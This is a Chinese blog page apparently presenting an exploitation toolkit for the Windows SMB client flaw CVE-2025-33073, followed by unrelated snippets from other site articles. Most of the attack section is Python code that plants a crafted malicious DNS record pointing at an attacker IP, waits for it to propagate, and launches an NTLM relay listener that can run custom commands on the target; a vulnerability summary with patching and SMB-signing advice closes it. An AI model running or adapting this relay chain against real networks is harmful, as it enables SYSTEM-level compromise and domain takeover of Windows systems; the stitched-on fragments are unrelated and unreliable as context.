news 2026/4/3 5:45:02

Windows SMB RCE漏洞CVE-2025-33073分析与利用工具

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
Windows SMB RCE漏洞CVE-2025-33073分析与利用工具

Windows SMB RCE漏洞CVE-2025-33073分析与利用工具

项目描述

该项目是一个针对Windows SMB客户端远程代码执行漏洞CVE-2025-33073的安全研究与渗透测试工具集。该漏洞被标记为高危(CVSS 8.8分),影响Windows 10、11及Server 2012-2025的所有版本,允许攻击者在经过身份验证的情况下通过网络实现SYSTEM级别的远程代码执行。工具集包含DNS记录操作和NTLM中继攻击功能,用于模拟和测试相关攻击场景。

功能特性

  • DNS记录操作:通过dnstool.py工具添加恶意DNS记录,支持ADIDNS over LDAP交互
  • NTLM中继攻击:利用impacket-ntlmrelayx工具发起SMB中继攻击,支持自定义命令执行
  • DNS传播监控:自动检测DNS记录是否已成功传播,支持超时控制
  • 多终端支持:可在当前终端或新xterm窗口中启动监听器
  • Kerberos集成:支持Kerberos身份验证,可与LDAP服务交互
  • 漏洞利用辅助:专门针对CVE-2025-33073漏洞的利用环境搭建

安装指南

系统要求

  • Python 3.x
  • impacket库
  • ldap3库
  • dnspython库
  • xterm(如需在新窗口中启动监听器)

依赖安装

pipinstallimpacket ldap3 dnspython

在Linux/macOS上安装

# 克隆相关工具gitclone<repository-url>cd<project-directory># 确保脚本有执行权限chmod+x *.py# 安装系统依赖(Debian/Ubuntu)sudoapt-getinstallxtermdig

使用说明

基础使用示例

#!/usr/bin/env python3importshleximportsysimportargparseimportsubprocessimporttime# 静态DNS记录常量STATIC_DNS_RECORD="localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA"defrun_dnstool(user,password,attacker_ip,dns_ip,dc_fqdn):""" 使用dnstool.py添加恶意DNS记录 """print("[*] Adding malicious DNS record using dnstool.py...")dnstool_cmd=["python3","dnstool.py","-u",user,"-p",password,"-a","add","-r",STATIC_DNS_RECORD,"-d",attacker_ip,"-dns-ip",dns_ip,dc_fqdn]subprocess.run(dnstool_cmd,check=True)print("[+] DNS record added.")

监控DNS记录传播

defwait_for_dns_record(record,dns_ip,timeout=60):""" 等待DNS记录传播并验证 """timeout=int(timeout)print(f"[*] Waiting for DNS record{record}to propagate...")start_time=time.time()whiletime.time()-start_time<timeout:try:result=subprocess.run(["dig","+short",record,f"@{dns_ip}"],capture_output=True,text=True)ifresult.stdout.strip():print("[+] DNS record is live.")returnTrueexceptExceptionase:print(f"[!] Error checking DNS record:{e}")time.sleep(2)print("[!] Timeout reached. DNS record not found.")returnFalse

启动NTLM中继监听器

defstart_ntlmrelayx(target,cli_only=False,custom_command=None,socks=False):""" 启动impacket-ntlmrelayx监听器 """ifcli_only:print("[*] Starting ntlmrelayx listener in this terminal...")ifcustom_command:cmd=["impacket-ntlmrelayx","-t",target,"-smb2support","-c",custom_command]else:cmd=["impacket-ntlmrelayx","-t",target,"-smb2support"]ifsocks:cmd.append("-socks")returnsubprocess.Popen(cmd)else:print("[*] Starting ntlmrelayx listener in a new xterm...")ifcustom_command:cmd=["xterm","-hold","-e","impacket-ntlmrelayx","-t",target,"-smb2support","-c",custom_command]else:cmd=["xterm","-hold","-e","impacket-ntlmrelayx","-t",target,"-smb2support"]ifsocks:cmd.insert(-1,"-socks")returnsubprocess.Popen(cmd)

核心代码

DNS工具核心功能

#!/usr/bin/env python""" ADIDNS over LDAP交互工具 Copyright (c) 2019 Dirk-jan Mollema (@_dirkjan) """importsysimportargparseimportgetpassimportreimportosimportsocketfromstructimportunpack,packfromimpacket.structureimportStructurefromimpacket.krb5.ccacheimportCCachefromimpacket.krb5.kerberosv5importgetKerberosTGT,getKerberosTGSfromimpacket.krb5.typesimportPrincipalfromimpacket.krb5importconstantsfromldap3importNTLM,Server,Connection,ALL,LEVEL,BASE,MODIFY_DELETE,MODIFY_ADD,MODIFY_REPLACE,SASL,KERBEROSfromlib.utils.kerberosimportldap_kerberosimportldap3fromimpacket.ldapimportldaptypesimportdns.resolverimportdatetimedefprint_m(string):"""打印消息"""sys.stderr.write('\033[94m[-]\033[0m %s\n'%(string))defprint_o(string):"""打印成功信息"""sys.stderr.write('\033[92m[+]\033[0m %s\n'%(string))defprint_f(string):"""打印失败信息"""sys.stderr.write('\033[91m[!]\033[0m %s\n'%(string))

漏洞信息结构

# ✨ CVE-2025-33073: Windows SMB RCE Vulnerability 🚨# 🔥 High-Severity Authenticated Remote Code Execution 🔥# Improper Access Control in Windows SMB Client (CWE-284)# 🛡️ 关键信息概览""" CVSS v3.1评分: 8.8 (高危) 受影响系统: Windows 10, 11, Server 2012–2025 (所有版本) 披露日期: 2025年6月10日 (已在2025年6月补丁星期二修复) 攻击向量: 网络 (需身份验证) 影响: SYSTEM级别代码执行,通过Kerberos中继进行横向移动 绕过: NTLM反射缓解措施 """# 🛠️ 立即缓解措施""" 1. 立即打补丁! → 应用Microsoft更新 (例如 KB5060998) → Microsoft更新指南: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-33073 2. 启用SMB签名 → 在所有客户端和服务器上强制执行 → 使用命令: Set-SmbClientConfiguration -RequireSecuritySignature $true 3. 限制NTLM使用 → 尽可能阻止NTLM → 使用EDR工具监控中继尝试 4. 为什么这个漏洞重要? - 绕过传统的NTLM保护 - 即使在SMB签名未强制执行的情况下也能工作 - 在配置不当的AD环境中实现完整的域接管 """

该工具集专门设计用于安全研究人员和渗透测试人员,以了解和防御CVE-2025-33073漏洞的相关攻击。请仅在授权测试环境中使用这些工具。FINISHED
6HFtX5dABrKlqXeO5PUv/84SoIo+TE3firf/5vX8AZ5IUcd+bvYYh2w++QDLvscF
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/3/12 21:56:49

开题报告 springboot和vue培训机构教学效果反馈系统的设计与实现

目录 系统背景与意义技术选型核心功能模块系统特色预期成果 项目技术支持可定制开发之功能亮点源码获取详细视频演示 &#xff1a;文章底部获取博主联系方式&#xff01;同行可合作 系统背景与意义 随着在线教育的发展&#xff0c;培训机构对教学效果反馈的需求日益增加。Spri…

作者头像 李华
网站建设 2026/3/14 13:37:43

基于微信小程序的同城跑腿平台【源码文末联系】

基于微信小程序的同城跑腿平台 两个角色&#xff08;管理员&#xff0c;用户&#xff09; 效果如下&#xff1a; 管理员首页面 用户管理页面 跑腿任务管理页面 任务评价管理页面 用户首页面 任务详情页面 任务类型页面 导航页面 研究背景 随着城市化进程加速与居民生活节奏…

作者头像 李华
网站建设 2026/4/3 5:36:04

1.9 长事务危害解析:为什么它会让数据库性能雪崩?

1.9 长事务危害解析:为什么它会让数据库性能雪崩? 📚 学习目标 通过本节学习,你将掌握: ✅ 长事务的定义、识别和危害机制 ✅ MVCC机制对长事务的影响 ✅ 长事务导致的回滚段膨胀问题 ✅ 长事务的检测、监控和预防方法 ✅ 业务逻辑优化避免长事务的最佳实践 🎯 学习收…

作者头像 李华
网站建设 2026/3/30 20:05:29

基于Qt 5.12.4的Halcon视觉流程框架编译测试成功报告

qt联合halcon视觉流程框架 正常编译 测试正常 qt5.12.4 直接上手搞QtHalcon的环境配置可能会遇到不少坑&#xff0c;这里分享下我的踩坑记录。先说下环境&#xff1a;Qt5.12.4VS2017&#xff0c;Halcon用的是20.11版本。整个过程最头疼的就是动态库加载和内存管理的问题。 首…

作者头像 李华
网站建设 2026/3/31 7:08:21

拖延症福音!千笔,继续教育论文写作神器

你是否在论文写作中屡屡受挫&#xff1f;选题无从下手&#xff0c;框架混乱不堪&#xff0c;文献资料难以查找&#xff0c;查重率高得让人焦虑&#xff0c;格式问题更是反复修改仍不满意。这些困扰是否让你倍感压力&#xff1f;别再让论文成为你毕业路上的“拦路虎”&#xff0…

作者头像 李华
网站建设 2026/3/21 8:21:40

面试必看:单调递增的数字

学习笔记&#xff1a;LeetCode 738. 单调递增的数字 题目描述 当且仅当每个相邻位数上的数字 xxx 和 yyy 满足 x≤yx \le yx≤y 时&#xff0c;我们称这个整数是单调递增数字。 给定一个整数 nnn&#xff0c;返回小于或等于 nnn 的最大单调递增数字。 示例 输入&#xff1a…

作者头像 李华